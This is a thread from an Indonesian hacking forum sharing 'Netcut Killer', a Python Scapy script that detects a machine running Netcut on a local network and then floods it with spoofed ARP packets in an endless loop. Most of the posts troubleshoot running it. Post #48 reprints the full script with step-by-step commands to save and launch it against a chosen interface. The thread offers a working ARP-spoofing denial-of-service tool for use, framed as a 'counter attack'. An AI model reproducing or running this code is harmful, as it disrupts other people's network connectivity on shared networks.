[Share] Netcut Killer !
#41
om,ini kalo buat windows bisa gak ?
>> OJO DUMEH <<

#42
kok gak bisa ya Sad

Code:
root@bt:~/APP# python netcatkiller.py
  File "netcatkiller.py", line 3
    Title: Netcut Denial of Service Vulnerability
         ^
SyntaxError: invalid syntax
>> OJO DUMEH <<

#43
(12-04-2012, 06:35 PM)amanojaku Wrote: kok gak bisa ya Sad

Code:
root@bt:~/APP# python netcatkiller.py
  File "netcatkiller.py", line 3
    Title: Netcut Denial of Service Vulnerability
         ^
SyntaxError: invalid syntax

Copy Paste ulang om scripnya ...
Kalo gak, edit script nya, tambahin "#" sebelum Title ...
Contoh : #Title: Netcut Denial of Service Vulnerability

note :
File "netcatkiller.py", line 3
itu maksdunya ada command / perintah yang tidak diketahui, di baris 3 > file netcatkiller.py

#44
klo di combo ma arpon kaya nya sangar nih..

#45
kayaknya mantap bener nih tools \m/
ijin nyoba om :d :-bd :-bd
I am Just Lammer Sakit Hati
[/size]

#46
(12-04-2012, 06:35 PM)amanojaku Wrote: kok gak bisa ya Sad

Code:
root@bt:~/APP# python netcatkiller.py
  File "netcatkiller.py", line 3
    Title: Netcut Denial of Service Vulnerability
         ^
SyntaxError: invalid syntax

kalo ga bisa coba ambil netcut killer dari tools ane di CAST bro Big Grin search di pemrograman bash di forum ini

#47
save scriptnya.

Code:
netcut.py

lalu, chmod filenya.

Code:
chmod +x netcut.py

Setelah selesai chmod, jalankan

Code:
python netcut.py wlan0

ni perbaikan dr penjelasan mas THTJ
** wlan0 diganti dengan interface yg mau dipakai kalo dr LAN gunakan eth0
pasti jalan...Wink

#48
biar lbh gampang dimengerti saya buat urutannya dr komentar2 tman diatas...

ketik dr terminal backtrack
Code:
gedit netcutkiller.py
atau pada terminal Kali
Code:
leafpad netcutkiller.py

lalu copi paste kode dibawah ini :

Code:
#!/usr/bin/env python
#Exploit Title: Netcut Denial of Service Vulnerability
#Author: MaYaSeVeN
#Greetz: Inj3ct0r 1337day Exploit DataBase (1337day.com)
#Blog:
#PoC: Video  /user/mayaseven
#Picture /-GcwpOXx7ers/TwGVoyj8SmI/AAAAAAAAAxs/wSGL1tKGflc/s1600/a.png
#Version: Netcut 2
#Software Link: /?jiiyq2wcpp41266
#Tested on: Windows Xp, Windows 7
#Greetz :  ZeQ3uL, c1ph3r, x-c0d3, p3lo, Retool2, Gen0TypE, Windows98SE, Sumedt, Rocky Sharma

from scapy.all import sniff,Ether,ARP,RandIP,RandMAC,Padding,sendp,conf
import commands,os,sys

#gw_mac = commands.getoutput("arp -i %s | grep %s" % (conf.iface,conf.iface)).split()[2]
gw_ip  = commands.getoutput("ip route list | grep default").split()[2]
        
def protect(gw_ip,gw_mac):
        os.popen("arp -s %s %s" %(gw_ip,gw_mac))
        print "Protected himself"
        
def detect():
                ans = sniff(filter='arp',timeout=7)
                target=[]
                for r in ans.res:
                        target.append(r.sprintf("%ARP.pdst% %ARP.hwsrc% %ARP.psrc%"))
                return target

def preattack(gw_ip):
        num = []
        count = 0
        target = 0
        temp = 0
        print "Detecting..."
        d = detect()
        for i in range(len(d)):
                if d[i].split()[0] == "255.255.255.255":
                        num.append(d.count(d[i]))
                        if d.count(d[i]) > count:
                                count = d.count(d[i])
                                target = i
                if d[i].split()[0] == gw_ip:
                        temp += 1        
        if len(d) < 7:
                print "[-] No one use Netcut or try again"
                exit()
        if len(num)*7 < temp:
                num[:] = []
                count = 0
                result = float(temp)/len(d)*100
                for j in range(len(d)):
                        if d[i].split()[0] == gw_ip:
                                num.append(d.count(d[j]))
                                if d.count(d[i]) > count:
                                        count = d.count(d[i])
                                        target = i
                        num.reverse()
                        result = float(temp)/len(d)*100
                print target
        else:
                num.reverse()
                result = float(num[0]+temp)/len(d)*100
        
        print "There is a possibility that " + str(result) + "%"
        if result>= 50:
                target_mac = d[target].split()[1]
                target_ip = d[target].split()[2]
                print "[+]Detected, Netcut using by IP %s MAC %s" %(target_ip,target_mac)
                attack(target_mac,target_ip,gw_ip)      
        else:
                print "[-] No one use Netcut or try again"

def attack(target_mac,target_ip,gw_ip):
        print "[+]Counter Attack !!!"
        e = Ether(dst="FF:FF:FF:FF:FF:FF")
        while 1:
                a = ARP(psrc=RandIP(),pdst=RandIP(),hwsrc=RandMAC(),hwdst=RandMAC(),op=1)
                p = e/a/Padding("\x00"*18)
                sendp(p,verbose=0)
                a1 = ARP(psrc=gw_ip,pdst=target_ip,hwsrc=RandMAC(),hwdst=target_mac,op=2)
                p1 = e/a1/Padding("\x00"*18)
                sendp(p1,verbose=0)
                
if __name__ == '__main__':
        os.system("clear")
        print   "###################################################"
        print   " __  __        __       __     _____   __        __  _   _"
        print   "|  \/  |   \ \   / /   / ____|  \ \    / / | \ | |"
        print   "| \  / | __ \ \_/ /_ _| (___   __\ \  / /__|  \| |"
        print   "| |\/| |/ _\ \   / _\ |\___ \ / _ \ \/ / _ \ . \ |"
        print   "| |  | | (_| || | (_| |____) |  __/\  /  __/ |\  |"
        print   "|_|  |_|\__,_||_|\__,_|_____/ \___| \/ \___|_| \_|"
        print   " "
        print   "###################################################"
        print   ""
        print   ""
        print   ""
        if len(sys.argv) == 2 or len(sys.argv) == 3:
                if len(sys.argv) == 2:
                        conf.iface=sys.argv[1]
                        preattack(gw_ip)
                if len(sys.argv) == 3:
                        conf.iface=sys.argv[1]
                        gw_mac = sys.argv[2]
                        protect(gw_ip,gw_mac)
                        preattack(gw_ip)
        else:
                print '''Mode:  
1.)Attack only
Usage: NetcutKiller <Interface>
e.g. NetcutKiller.py wlan0
                
2.)Attack with protect himself
Usage: NetcutKiller <Interface> <MAC_Gateway>
e.g. NetcutKiller.py wlan0 00:FA:77:AA:BC:AF
'''
======================
lalu simpan dan tutup

lalu, chmod filenya.

Code:
chmod +x netcutkiller.py

Setelah selesai chmod, jalankan

Code:
python netcutkiller.py wlan0

ni perbaikan dr penjelasan mas THTJ
** wlan0 diganti dengan interface yg mau dipakai kalo dr LAN gunakan eth0
pasti jalan...Wink

mudah2an ada yg warna hijau di kantungan plastik saya...:d






Users browsing this thread: 1 Guest(s)